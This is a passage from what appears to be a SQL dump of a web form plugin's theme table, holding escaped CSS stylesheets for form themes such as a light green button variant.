#dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #473C34;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #FFA15C;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #C78655;\r\n}\r\n\r\n.next-page div.wdform-page-button:hover {\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #FAB17A;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.button-submit {\r\ncolor: #473C34;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 35px;\r\nline-height: 35px;\r\nbackground: #FFA15C;\r\npadding: 0px 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder: 1px solid #C78655;\r\n}\r\n.button-submit:hover {\r\n	background: #FAB17A;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #FFA15C ;\r\n	color: #030303;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: \" \" ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"password\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #FFA15C ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #342114;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #C78655;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #342114;\r\n	cursor: pointer;\r\n	background-color: #FF8A34;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #FF8932 ;\r\n	background: -moz-linear-gradient(left, #F3BA28 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FFD325 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FEB824 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F3BA28 ), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FFD325 ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FEB824 ));\r\n	background: -o-linear-gradient(left, #F3BA28 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FFD325 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FEB824 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -ms-linear-gradient(left, #F3BA28 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FFD325 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FEB824 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -webkit-linear-gradient(left, #F3BA28 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FFD325 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FEB824 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\nbackground-color: #ECBE9C;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #473C34;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}',0),(23,'Theme 06 transparent (light green button)','.radio-div input[type=\"radio\"],\r\n.checkbox-div input[type=\"checkbox\"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #FFFFFF;\r\nborder: 1px solid #90EE90;\r\nmargin-bottom: 10px;\r\ncolor: #90EE90;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #6BD86B !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #473C34;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #6BD86B;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #459B45;\r\n}\r\n\r\n.next-page div.wdform-page-button:hover {\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #90EE90;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.previous-page div.wdform-page-button:before {\r\n	content: \" \";\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left;\r\n	height: 19px;\r\n	width: 20px;\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	top: -2px;\r\n	position: relative;\r\n}\r\n.button-submit {\r\ncolor: #473C34;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 35px;\r\nline-height: 35px;\r\nbackground: #6BD86B;\r\npadding: 0px 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder: 1px solid #459B45;\r\n}\r\n.button-submit:hover {\r\n	background: #90EE90;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #6BD86B ;\r\n	color: #030303;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: \" \" ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"password\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border: 1px solid #6BD86B ;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border: 1px solid #6BD86B  ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #6BD86B ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #6BD86B ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	